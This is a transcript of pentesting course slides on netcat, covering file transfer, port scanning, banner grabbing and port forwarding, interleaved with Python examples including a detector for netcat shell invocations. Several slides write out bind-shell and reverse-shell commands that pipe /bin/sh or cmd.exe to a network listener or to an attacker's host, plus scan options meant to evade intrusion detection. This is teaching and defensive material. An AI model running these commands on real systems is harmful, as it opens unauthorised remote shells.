
COMP265 - Pentesting netcat

Presentation transcript:

1 COMP265 - Pentesting netcat

2 What?
Like cat, but for networks
Standard input sent over the network to a remote ip:port
Packets from the network sent to standard output
Low level
Versatile
“The network Swiss army knife”

3 Basic Operation
Client mode:
– Connects to a specific remote port
Listen mode:
– Waits for a connection on a port
Both modes:
– Standard input is sent to the net
– Data from the net is sent to standard output
Messages from netcat itself are sent to standard error
Packets can have source routing attached

4 Netcat Command
May be the two-letter command “nc”
– Like cp and other traditional two-letter unix commands
– nc options hostname ports
May be the word “netcat”
Another variant, “ncat”, from the nmap project
– Supports a few more options
Depends on the platform; Kali has both
Sometimes you have to compile from source to get all options (SuSE)

5 Command Options
-l          listen mode, for inbound connects
-L          "Listen harder": persistent listener (Windows only)
-n          numeric-only IP addresses, no DNS
-p port     local port number
-r          randomize local and remote ports
-s addr     local source address
-u          UDP mode
--sctp      SCTP mode
-v          verbose [use twice to be more verbose]

6 Command Options
-i secs     delay interval for lines sent, ports scanned
-t          answer TELNET negotiation
-w secs     timeout for connects and final net reads
-z          zero-I/O mode [used for scanning]
These three options are not available in some packages:
-o file or -x file      (hex) dump of traffic
-e prog or -c command   program to exec after connect
-g gateway              source-routing hop point[s], up to 8

7 What for?
Send files
Telnet
Backdoor
Port scan
Banner grabbing
Reverse shell
Relay (proxy)
Port forward
Replay

8 Arguments
Host can be a name or an IP address
-n = no DNS lookups, IP only; otherwise a full DNS forward and reverse lookup is done
-v or -vv = verbose messages, always sent to standard error
-w limits the wait time; -w 3 recommended
-o filename produces a dump of all traffic (each line marked > or < by direction)
-i slows down sending; used if the input comes from a file

9 Send Files
Sender
– nc -l -p 80 < file.txt
– cat file.txt | nc -l -p 80
Receiver
– nc > file.txt
Note the use of redirect and pipe
Receiver could have been a web browser
>, < and | all enhance the power of netcat

10 Another Example
dd if=/dev/sda3 | gzip | nc -l 80
nc > sda3.img.gz
Or, the listener can be the receiver:
nc -w 3 -l 80 > /home.cmb.tar.gz
tar -cvf - /home/cmb | gzip | nc

11 nc and telnet
cmblap:~ # telnet
Trying
Connected to
Escape character is '^]'.
220 fivefortyfour.com ESMTP
^C
^]
telnet> quit
Connection closed.
cmblap:~ # netcat
fivefortyfour.com ESMTP
helo
250 fivefortyfour.com
quit
221 fivefortyfour.com
cmblap:~ #

12 As telnet client
Netcat quits when you want it to
Doesn't pay attention to standard input EOF
Doesn't require an escape character
Less cruft
Transfers arbitrary binary data
Better utility for probing services
Can use UDP
-t responds automatically to telnet option negotiations
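The two slides above describe netcat's whole job: bytes from standard input go to the socket, bytes from the socket go to standard output, and a third stream (standard error) carries netcat's own messages. The following Python sketch is an added example written for this page, not code from the course or from any netcat implementation. It uses socket.socketpair() as a stand-in for a TCP connection, a constructed SMTP-style banner as the "remote service", and io.BytesIO objects as stdin/stdout, so it runs offline. It deliberately half-closes the socket when stdin hits EOF, which is ncat's behaviour; the slide points out that traditional netcat ignores stdin EOF and stays connected.

```python
import io
import socket
import threading


def relay(sock, src, dst, bufsize=4096):
    """The core of netcat: copy src (stdin) to the socket and the socket to dst (stdout).

    Returns the number of bytes received from the network. When src reaches EOF the
    sending half of the socket is shut down so the peer sees our EOF, but we keep
    reading until the peer closes. That is ncat's behaviour; traditional netcat, as
    the slide above notes, ignores stdin EOF and keeps the connection open.
    """
    def send_side():
        while True:
            chunk = src.read(bufsize)
            if not chunk:           # EOF on "stdin"
                break
            sock.sendall(chunk)
        try:
            sock.shutdown(socket.SHUT_WR)
        except OSError:
            pass                    # peer already gone; nothing more to signal

    sender = threading.Thread(target=send_side, daemon=True)
    sender.start()
    received = 0
    while True:
        data = sock.recv(bufsize)
        if not data:                # peer closed its sending half
            break
        dst.write(data)
        received += len(data)
    sender.join()
    return received


def demo():
    """Run relay() against a constructed peer; socketpair() stands in for a TCP connection."""
    ours, peer = socket.socketpair()
    # Constructed "remote service": it sends an SMTP-style banner, then signals EOF.
    peer.sendall(b"220 mail.example.test ESMTP (constructed banner)\r\n")
    peer.shutdown(socket.SHUT_WR)
    stdin = io.BytesIO(b"QUIT\r\n")       # what the user would type
    stdout = io.BytesIO()                 # what the user would see
    n = relay(ours, stdin, stdout)
    sent_to_peer = peer.recv(4096)        # what arrived at the "service"
    peer.close()
    ours.close()
    return n, stdout.getvalue(), sent_to_peer


if __name__ == "__main__":
    count, out, sent = demo()
    print(f"received {count} bytes: {out!r}; peer got {sent!r}")
```

The two directions are independent, which is why one thread per direction is the natural shape; a real client would replace the BytesIO objects with sys.stdin.buffer and sys.stdout.buffer and the socketpair with socket.create_connection((host, port)).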

13 Probing?
Netcat can do port scans
This took around 1 sec
cmblap:~ # netcat -v -w 2 -z jabber.fivefortyfour.com
jabber.fivefortyfour.com [ ] 631 (ipp) open
jabber.fivefortyfour.com [ ] 445 (microsoft-ds) open
jabber.fivefortyfour.com [ ] 139 (netbios-ssn) open
jabber.fivefortyfour.com [ ] 111 (sunrpc) open
jabber.fivefortyfour.com [ ] 110 (pop3) open
jabber.fivefortyfour.com [ ] 80 (http) open
jabber.fivefortyfour.com [ ] 53 (domain) open
jabber.fivefortyfour.com [ ] 25 (smtp) open
jabber.fivefortyfour.com [ ] 24 (?) open
jabber.fivefortyfour.com [ ] 22 (ssh) open
cmblap:~ #

14 UDP scans too
These are much slower
cmblap:~ # netcat -v -w 2 -z -u jabber.fivefortyfour.com
jabber.fivefortyfour.com [ ] 67 (bootps) open
jabber.fivefortyfour.com [ ] 53 (domain) open

15 Scanning Options
-i
– Delay interval to slow down scans
-r
– Randomise ports, including source
-z
– Send no data (TCP) or minimal data (UDP)
-i and -r help to avoid IDS
-vv reports closed ports
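Scan output in the "host [ip] port (service) open" shape shown on the previous slides is easy to post-process, and the defender's first question about any such scan is which open ports are not on the host's approved list and which ones netcat could not even name (the "24 (?) open" line above). The parser below is an added example written for this page, not course code; the sample output is constructed to match the slide's format, uses the documentation address range 192.0.2.0/24, and includes -vv "Connection refused" lines for closed ports as slide 15 describes.

```python
import re
from collections import defaultdict

# One netcat -v/-vv result line: "host [ip] port (service) status"
LINE_RE = re.compile(
    r"^(?P<host>\S+) \[(?P<ip>[^\]]*)\] (?P<port>\d+) \((?P<service>[^)]*)\) (?P<status>.+)$"
)

# Constructed sample modelled on the slide's output (192.0.2.x is the documentation range).
SAMPLE = """\
scanhost:~ # netcat -vv -w 2 -z jabber.example.test 20-25 80
jabber.example.test [192.0.2.10] 25 (smtp) open
jabber.example.test [192.0.2.10] 24 (?) open
jabber.example.test [192.0.2.10] 23 (telnet) : Connection refused
jabber.example.test [192.0.2.10] 22 (ssh) open
jabber.example.test [192.0.2.10] 21 (ftp) : Connection refused
jabber.example.test [192.0.2.10] 20 (ftp-data) : Connection refused
jabber.example.test [192.0.2.10] 80 (http) open
scanhost:~ #
"""


def parse_scan(text):
    """Turn scan output into {host: {"open": {port: service}, "closed": {port: service}}}.

    Lines that are not result lines (prompts, DNS warnings) are skipped. Any status
    other than the literal "open" (-vv "Connection refused", timeouts) counts as closed.
    """
    results = defaultdict(lambda: {"open": {}, "closed": {}})
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        bucket = "open" if m.group("status").strip() == "open" else "closed"
        results[m.group("host")][bucket][int(m.group("port"))] = m.group("service")
    return dict(results)


def unknown_services(results):
    """Open ports netcat could not name ("?" in the output): candidates for a banner grab."""
    return {host: sorted(p for p, svc in r["open"].items() if svc == "?")
            for host, r in results.items()}


def unexpected_open(results, baseline):
    """Open ports missing from each host's approved baseline: what a defender reviews first."""
    return {host: sorted(set(r["open"]) - set(baseline.get(host, ())))
            for host, r in results.items()}


if __name__ == "__main__":
    scan = parse_scan(SAMPLE)
    print(scan)
    print("unknown services:", unknown_services(scan))
    print("not in baseline:", unexpected_open(scan, {"jabber.example.test": [22, 25]}))
```

The baseline passed to unexpected_open is whatever the site's inventory says should be listening; with the constructed sample and a baseline of ports 22 and 25, ports 24 and 80 come back as findings and port 24 is additionally flagged as unidentified.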

16 Fancier Scan
echo QUIT | nc -v -w 5 target-host

17 Banner Grabbing
cmblap:~ # netcat -v jabber.fivefortyfour.com
jabber.fivefortyfour.com [ ] 110 (pop3) open
+OK Hello there.
quit
+OK Better luck next time.
cmblap:~ # netcat -v jabber.fivefortyfour.com
jabber.fivefortyfour.com [ ] 25 (smtp) open
220 fivefortyfour.com ESMTP
quit
221 fivefortyfour.com
cmblap:~ # netcat -v jabber.fivefortyfour.com
jabber.fivefortyfour.com [ ] 22 (ssh) open
SSH-1.99-OpenSSH_4.1
quit
Protocol mismatch.

18 Chat Session
Just for fun
Machine 1
– nc -l -p 1234
Machine 2
– nc
Both machines' keyboard input appears on the other machine's screen
Note: use the -v option to diagnose problems that may appear

19 Web Browser
echo "GET somewhere.com" | nc address 80 > page.html

20 Backdoor
By routing netcat's standard output to a command interpreter, we create a remote shell
cmblap:/usr/local/src/netcat-0.7.1/src # ./netcat -l -n -v -s <addr> -p <port> -e /bin/sh
Connection from :4289
cmblap:/usr/local/src/netcat-0.7.1/src #
I had to download and build from source to enable the -e switch
Cannot pass parameters to the program

21 On the other end
pdlnx2:~ # netcat -v
DNS fwd/rev mismatch: cmblap.fivefortyfour.com != cmblap
cmblap.fivefortyfour.com [ ] 1234 (search-agent) open
df
Filesystem  1K-blocks  Used  Available  Use%  Mounted on
/dev/sda  %  /
udev  %  /dev
/dev/sda  %  /windows/C
/dev/sda  %  /home/cmb
exit
pdlnx2:~ #

22 More backdoors
On Windows: nc -L -p <port> -d -e cmd.exe
-L means listen hard
– wait for connections
– Not needed on unix
-d means detach from the process
– Also not needed on linux

23 “Shoveling” a Shell
Aka Reverse Shell
Compromised machine cannot accept connections
– Has to initiate connections because of firewall/NAT
Attacker listens from outside the firewall
– netcat -v -l -p 1234
Script on the compromised machine starts a shell, then connects to the attacker
– netcat ip.addr <port> -e /bin/sh
Script has to run forever, or at timed intervals, or in response to some event
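Slides 20 to 23 show the three shapes a netcat backdoor takes on the command line: a listener with -e (bind shell), a Windows -L listener, and an outbound connection with -e (reverse shell). From the defender's side these are exactly the shapes to alert on in process-execution logs (auditd execve records, Sysmon event 1, EDR command-line telemetry). The classifier below is an added example written for this page, not course code; the process command lines it checks are constructed, use the documentation address 198.51.100.7, and mirror the slides' syntax. Flag names come from slide 6 (-e and -c, as in traditional netcat) plus ncat's --exec and --sh-exec.

```python
import shlex

NETCAT_NAMES = {"nc", "netcat", "ncat", "nc.traditional", "nc.openbsd", "nc.exe", "ncat.exe"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}   # -e/-c per slide 6; --exec/--sh-exec are ncat's
LISTEN_FLAGS = {"-l", "-L", "--listen"}             # -L is the Windows "listen harder" form

LISTEN_EXEC = "listener that execs a program (bind shell, or a relay as on the port-forwarding slide)"
CONNECT_EXEC = "outbound connection that execs a program (reverse shell)"


def expand(args):
    """Split bundled short flags so -lvnp is seen as -l -v -n -p."""
    out = []
    for a in args:
        if a.startswith("-") and not a.startswith("--") and len(a) > 2 and a[1:].isalpha():
            out.extend("-" + ch for ch in a[1:])
        else:
            out.append(a)
    return out


def classify(cmdline):
    """Return (verdict, exec_program) for one process command line, or None if it is not netcat."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:              # unbalanced quotes: not something we can reason about
        return None
    if not argv:
        return None
    binary = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if binary not in NETCAT_NAMES:
        return None
    args = expand(argv[1:])
    listening = any(a in LISTEN_FLAGS for a in args)
    exec_prog = None
    for i, a in enumerate(args):
        if a in EXEC_FLAGS and i + 1 < len(args):
            exec_prog = args[i + 1]                  # "-e /bin/sh", "--sh-exec 'ncat ...'"
        elif a.startswith(("--exec=", "--sh-exec=")):
            exec_prog = a.split("=", 1)[1]           # "--exec=/bin/sh"
    if exec_prog and listening:
        return (LISTEN_EXEC, exec_prog)
    if exec_prog:
        return (CONNECT_EXEC, exec_prog)
    if listening:
        return ("plain listener", None)
    return ("client connection", None)


def triage(cmdlines):
    """Keep only the invocations worth an alert: any netcat that execs a program."""
    alerts = []
    for cmd in cmdlines:
        result = classify(cmd)
        if result and result[1]:
            alerts.append((cmd, result[0], result[1]))
    return alerts


# Constructed process command lines, in the shapes the backdoor slides show.
SAMPLE_PROCESSES = [
    "nc -lvnp 4444 -e /bin/sh",
    "nc.exe -L -p 5555 -d -e cmd.exe",
    "netcat 198.51.100.7 1234 -e /bin/sh",
    '/usr/bin/ncat -l localhost 8080 --sh-exec "ncat remote.example.test 80"',
    "nc -l -p 1234",
    "nc -w 3 mail.example.test 25",
    "cat /etc/hosts",
]

if __name__ == "__main__":
    for cmd, verdict, prog in triage(SAMPLE_PROCESSES):
        print(f"{verdict}: {prog!r} <- {cmd}")
```

The ncat port-forward from slide 24 is reported under the same "listener that execs a program" verdict as a bind shell, which is intentional: the telemetry cannot tell a relay from a backdoor, so both go to an analyst. Command-line matching is a starting point only; a renamed or statically built binary defeats it, which is why it belongs alongside the scan baseline check (unexpected listening ports) rather than replacing it.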

24 Port Forwarding
Forwarding localhost port 8080 to remote host port 80:
ncat -l localhost 8080 --sh-exec "ncat remote.host 80"

25 References
ncat
– http://nmap.org/ncat/
– The user's guide is a good reference
netcat
– http://netcat.sourceforge.net/
Don't forget the man pages

26 Lab
Lab today will exercise many of these functions
Due the day of the lab next week, Feb 18
– No new lab next week

